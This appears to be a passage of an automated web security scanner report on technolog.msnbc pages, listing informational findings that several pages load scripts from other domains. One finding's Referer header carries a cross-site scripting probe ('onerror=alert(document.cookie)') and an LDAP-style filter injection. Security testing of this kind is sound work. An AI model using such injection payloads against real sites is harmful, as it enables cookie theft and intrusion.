...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.328. http://technolog.msnbc.redacted/_nv/more/section/archive

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_nv/more/section/archive

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_nv/more/section/archive HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 02:52:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 243535

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/ffb30d0d6c6ea0fa18ad06ed093685a55fe064e8.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/6fcc5bd2a149dc02951529f95ade36053a0ff882.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5942398" class="inlineCode photo_align_block" data-contentid="5942398"><script src="http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.329. http://technolog.msnbc.redacted/_vine/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_vine/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /_vine/a HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_vine/printer?call=streamSessionObjects&sectionDomain=technolog&path=/_news/2011/01/28/*)(sn=*/b7e29%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E626a72a1b57
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350377678; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:35:22 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40435

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/6424485dfa93bc7ba9fe5d9f2e2924a193eab46a.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.330. http://technolog.msnbc.redacted/amazon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /amazon

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /amazon HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=296
Date: Sun, 30 Jan 2011 02:43:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126941

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.331. http://technolog.msnbc.redacted/android

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /android

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /android HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:36:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142413

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="vine-inlineCode__5780422" class="inlineCode photo_align_right" data-contentid="5780422"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.332. http://technolog.msnbc.redacted/angry-birds

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /angry-birds

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /angry-birds HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:50:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123645

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...

23.333. http://technolog.msnbc.redacted/app-store

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /app-store

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /app-store HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:46:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 166548

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
ink class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a81ebef63e500993b191fc7b3cc8f20b2f2a585d.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/3f0429849f567fd9350834ce5aac1e92e0fcb616.js?v=23247"></script>
...[SNIP]...
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
